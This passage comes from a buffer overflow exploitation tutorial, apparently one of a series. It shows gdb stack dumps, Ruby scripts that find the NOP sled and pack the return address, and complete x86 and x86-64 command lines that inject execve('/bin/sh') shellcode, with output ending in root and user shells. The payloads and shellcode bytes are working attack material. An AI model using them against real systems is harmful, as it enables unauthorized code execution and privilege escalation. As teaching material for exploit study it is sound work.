 0xbffff5f0:	0x622f6c61	0x9000666f	0x90909090	0x90909090
 0xbffff600:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff610:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff620:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff630:	0xeb909090	0x76895e1f	0x88c03108	0x46890746
 0xbffff640:	0x890bb00c	0x084e8df3	0xcd0c568d	0x89db3180
 0xbffff650:	0x80cd40d8	0xffffdce8	0x69622fff	0x68732f6e

The next step is to find the shellcode on the stack. The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack. This will cause execution to resume with the shell code once the function returns.
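Scanning a long dump by eye is error-prone, so the search for NOPs can be scripted. The sketch below parses three lines copied from the x/200x output above and reports the first word made up entirely of 0x90 bytes; `first_nop_word` is a name invented for this example.

```ruby
# Three lines copied from the gdb output above.
DUMP = <<~GDB
  0xbffff5e0: 0x00000000 0x6d6f682f 0x65742f65 0x63696e6b
  0xbffff5f0: 0x622f6c61 0x9000666f 0x90909090 0x90909090
  0xbffff600: 0x90909090 0x90909090 0x90909090 0x90909090
GDB

# Returns the address of the first 32-bit word that is all NOPs, or nil.
def first_nop_word(dump)
  dump.each_line do |line|
    base, *words = line.split
    next if base.nil?

    words.each_with_index do |word, i|
      # Each word is 4 bytes, so word i sits at base + 4 * i.
      return base.delete(":").hex + 4 * i if word.hex == 0x90909090
    end
  end
  nil
end

addr = first_nop_word(DUMP)
puts format("first full NOP word at 0x%08x", addr)
```

The word just before it, 0x9000666f, already has 0x90 as its highest byte, so on this little endian machine the sled itself begins one byte earlier.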

Protip: Advanced attacks include ascii shellcode for maximum evasion.


Note the NOPs above: the sled starts at 0xbffff5f7, and the first full word of NOPs is at 0xbffff5f8. 0xbffff610 will be used since it is a cleaner address that still lies inside the sled. Arranged in little endian format, this is "\x10\xf6\xff\xbf".
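The little endian conversion does not have to be done by hand. A minimal sketch using Ruby's `Array#pack` with the "V" directive (32-bit unsigned, little endian) is shown below; the sled start and length are the values read from the dump above, and the variable names are illustrative.

```ruby
address = 0xbffff610

# "V" packs a 32-bit unsigned integer in little endian byte order.
packed  = [address].pack("V")
escaped = packed.bytes.map { |b| format("\\x%02x", b) }.join
puts escaped

# Sanity check: the chosen address should fall inside the 60-byte NOP sled.
SLED_START = 0xbffff5f7
SLED_LEN   = 60
in_sled = (SLED_START...(SLED_START + SLED_LEN)).cover?(address)
puts "inside sled: #{in_sled}"
```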

On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68
 \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41
 \x41\x41\x41\x41\x41\x41"'`
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb
 \x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b
 \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'`
 (gdb) x/400x $rsp
Xochipilli says
I truncated this cause it was huge
 ...
 0x7fffffffe510:	0x00000064	0x00000000	0x00000003	0x00000000
 0x7fffffffe520:	0x00400040	0x00000000	0x00000004	0x00000000
 0x7fffffffe530:	0x00000038	0x00000000	0x00000005	0x00000000
 0x7fffffffe540:	0x00000008	0x00000000	0x00000007	0x00000000
 0x7fffffffe550:	0xf7ddd000	0x00007fff	0x00000008	0x00000000
 0x7fffffffe560:	0x00000000	0x00000000	0x00000009	0x00000000
 0x7fffffffe570:	0x00400400	0x00000000	0x0000000b	0x00000000
 0x7fffffffe580:	0x000003e8	0x00000000	0x0000000c	0x00000000
 0x7fffffffe590:	0x000003e8	0x00000000	0x0000000d	0x00000000
 0x7fffffffe5a0:	0x000003e8	0x00000000	0x0000000e	0x00000000
 0x7fffffffe5b0:	0x000003e8	0x00000000	0x00000017	0x00000000
 0x7fffffffe5c0:	0x00000000	0x00000000	0x00000019	0x00000000
 0x7fffffffe5d0:	0xffffe609	0x00007fff	0x0000001f	0x00000000
 0x7fffffffe5e0:	0xffffefe1	0x00007fff	0x0000000f	0x00000000
 0x7fffffffe5f0:	0xffffe619	0x00007fff	0x00000000	0x00000000
 0x7fffffffe600:	0x00000000	0x00000000	0xcc45c200	0xf80e704b
 0x7fffffffe610:	0xd5660936	0xff5959b5	0x36387878	0x0034365f
 0x7fffffffe620:	0x00000000	0x00000000	0x6d6f682f	0x6f782f65
 0x7fffffffe630:	0x6c69662f	0x622f7a65	0x622f666f	0x9000666f
 0x7fffffffe640:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe650:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe660:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe670:	0x90909090	0x90909090	0x48909090	0xbb48d231
 ...

Note that the nopsled begins just before 0x7fffffffe640, so this address is used as the return address (the value loaded into rip when main returns). Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.

Exploitation

After clearing the breakpoint, restart the application with the same command line argument, but replace the placeholder "\x41\x41\x41\x41" at the end of the argument with the return address found above ("\x10\xf6\xff\xbf" on x86).

 (gdb) clear main
 Deleted breakpoint 1 
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
 \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89
 \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e
 \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d
 \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", 
 "A"*7, "\x10\xf6\xff\xbf"'`
 process 2262 is executing new program: /bin/sh
 # whoami
 root
 #
On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e
 \x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f
 \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31
 \xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50
 \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 process 27319 is executing new program: /bin/dash
 $ whoami
 xo
 $
Xochipilli says
The x86-64 shellcode used in this example does not call setuid() so it will execute at the privileges of the exploited application

YAY! Successful exploitation has occurred.

Protip: If for some reason the exploitation was not successful, you could attempt a different return address.


Buffer overflow is part of a series on exploitation.